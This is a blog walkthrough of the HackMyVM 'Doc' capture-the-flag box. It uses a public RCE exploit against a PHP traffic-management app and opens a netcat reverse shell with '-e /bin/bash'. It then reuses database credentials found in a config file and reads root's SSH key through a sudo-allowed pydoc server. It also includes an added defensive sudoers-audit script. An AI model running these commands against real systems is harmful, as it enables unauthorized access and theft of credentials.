Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Doc Walkthrough

Scan the ports; only port 80 is open.

 nmap -sV -sC -p- -oN ports.log
 Nmap scan report for bah.hmv (
 Host is up (0.00070s latency).
 Not shown: 65534 closed ports
 80/tcp open  http    nginx 1.18.0
 | http-cookie-flags:
 |   /:
 |_      httponly flag not set
 |_http-server-header: nginx/1.18.0
 |_http-title: Online Traffic Offense Management System - PHP

Port 80 serves the Online Traffic Offense Management System. Google the exploit for it, and add doc.hmv to /etc/hosts.

Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Use the PoC to get a user shell.

 ~ (p2) python
 Url: http://doc.hmv
 Check Url ...
 [+] Bypass Login
 [+] Upload Shell
 [+] Exploit Done!
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Because this shell is not fully functional, we spawn a proper reverse shell.

 $ nc 1234 -e /bin/bash
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 python3 -c 'import pty;pty.spawn("/bin/bash")'

Found the password for user bella in initialize.php (the database credentials are reused for the system account).

 www-data@doc:~/html/traffic_offense$ cat initialize.php
 cat initialize.php
 $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
 if(!defined('base_url')) define('base_url','http://doc.hmv/');
 if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
 if(!defined('dev_data')) define('dev_data',$dev_data);
 if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
 if(!defined('DB_USERNAME')) define('DB_USERNAME',"bella");
 if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"be114yTU");
 if(!defined('DB_NAME')) define('DB_NAME',"doc");

Switch to user bella with that password.

 www-data@doc:~/html/traffic_offense$ su bella
 su bella
 Password: be114yTU
 bella@doc:/var/www/html/traffic_offense$ id
 uid=1000(bella) gid=1000(bella) groups=1000(bella),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Check the local listening ports: port 21 is actually SSH, bound locally, so we forward it out with socat.

 bella@doc:/$ ss -ntlp
 ss -ntlp
 State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
 LISTEN 0      80*          
 LISTEN 0      511*          
 LISTEN 0      128*          
 LISTEN 0      511             [::]:80           [::]:*          
 bella@doc:/$ socat TCP-LISTEN:5000,fork,reuseaddr tcp: &
 socat TCP-LISTEN:5000,fork,reuseaddr tcp: &
 [1] 571

Check sudo -l.

 bella@doc:~$ sudo -l
 Matching Defaults entries for bella on doc:
     env_reset, mail_badpass,
 User bella may run the following commands on doc:
     (ALL : ALL) NOPASSWD: /usr/bin/doc

Disassembling doc shows it is just a wrapper that runs pydoc3.9 as an HTTP server on port 7890.

 ; Attributes: bp-based frame
 ; int __cdecl main(int argc, const char **argv, const char **envp)
 public main
 main proc near
 ; __unwind {
 push    rbp
 mov     rbp, rsp
 lea     rdi, command    ; "/usr/bin/pydoc3.9 -p 7890"
 call    _system
 pop     rbp
 ; } // starts at 1135
 main endp
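As an added defender-side check (not part of this walkthrough or the box), the script below audits sudoers-style rules for NOPASSWD entries and inspects each allowed binary's printable strings, the way `strings` would, for a hidden interpreter call such as the `/usr/bin/pydoc3.9 -p 7890` wrapper found here. The sudoers text and the ELF-like blobs are constructed sample input; on a real host you would feed it /etc/sudoers, /etc/sudoers.d/* and the bytes of each listed binary.

```python
import re
import shlex

# Programs that, started from a root-owned wrapper, grant far more than the
# wrapper's name suggests (pydoc -p serves any file readable by its user).
RISKY = {"pydoc", "python", "perl", "sh", "bash"}
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?"
                     r"\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def parse_nopasswd_rules(text):
    """Return (user, runas, command) for every NOPASSWD command in sudoers text."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
        if m and "NOPASSWD" in m.group("tags"):
            for cmd in m.group("cmds").split(","):
                rules.append((m.group("user"), m.group("runas") or "root", cmd.strip()))
    return rules

def risky_wrapper(blob):
    """Return the embedded command line if the binary shells out to a RISKY program."""
    for s in re.findall(rb"[\x20-\x7e]{6,}", blob):            # like `strings`
        if s.startswith(b"/") and b" " in s:                    # looks like a command line
            cmd = s.decode("ascii")
            prog = shlex.split(cmd)[0].rsplit("/", 1)[-1]
            if re.sub(r"[\d.]+$", "", prog) in RISKY:          # pydoc3.9 -> pydoc
                return cmd
    return None

def audit(sudoers_text, binaries):
    """binaries maps command path -> file bytes; returns one finding per risky rule."""
    findings = []
    for user, runas, cmd in parse_nopasswd_rules(sudoers_text):
        path = shlex.split(cmd)[0]
        hidden = risky_wrapper(binaries.get(path, b""))
        if hidden:
            findings.append(f"{user} may run {path} as ({runas}) NOPASSWD; it execs: {hidden}")
    return findings

# Constructed sample input modelled on this box: /usr/bin/doc wraps pydoc3.9.
SAMPLE_SUDOERS = """Defaults env_reset, mail_badpass
bella ALL=(ALL : ALL) NOPASSWD: /usr/bin/doc
bella ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
bella ALL=(ALL) /usr/bin/less
"""
SAMPLE_BINARIES = {
    "/usr/bin/doc": b"\x7fELF\x00\x00/usr/bin/pydoc3.9 -p 7890\x00system\x00",
    "/usr/bin/systemctl": b"\x7fELF\x00\x00/usr/lib/systemd\x00",
}
```

Calling `audit(SAMPLE_SUDOERS, SAMPLE_BINARIES)` reports only the doc rule, since the systemctl rule's binary embeds no interpreter command and the less rule still requires a password.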

Google for the pydoc exploit.

Start the doc server with sudo.

 bella@doc:/$ sudo doc
 sudo doc
 Server ready at http://localhost:7890/
 Server commands: [b]rowser, [q]uit

In another terminal, we log in over SSH as user bella through the forwarded port, and fetch root's SSH key from the pydoc server.

 ~ ssh bella@ -p 5000       
 bella@'s password:
 Last login: Thu Aug 26 21:33:08 2021 from
 bella@doc:~$ curl http://localhost:7890/getfile?key=/root/.ssh/id_rsa

Log in over SSH as root with the key.

 ~ ssh root@ -p 5000 -i key
 root@doc:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
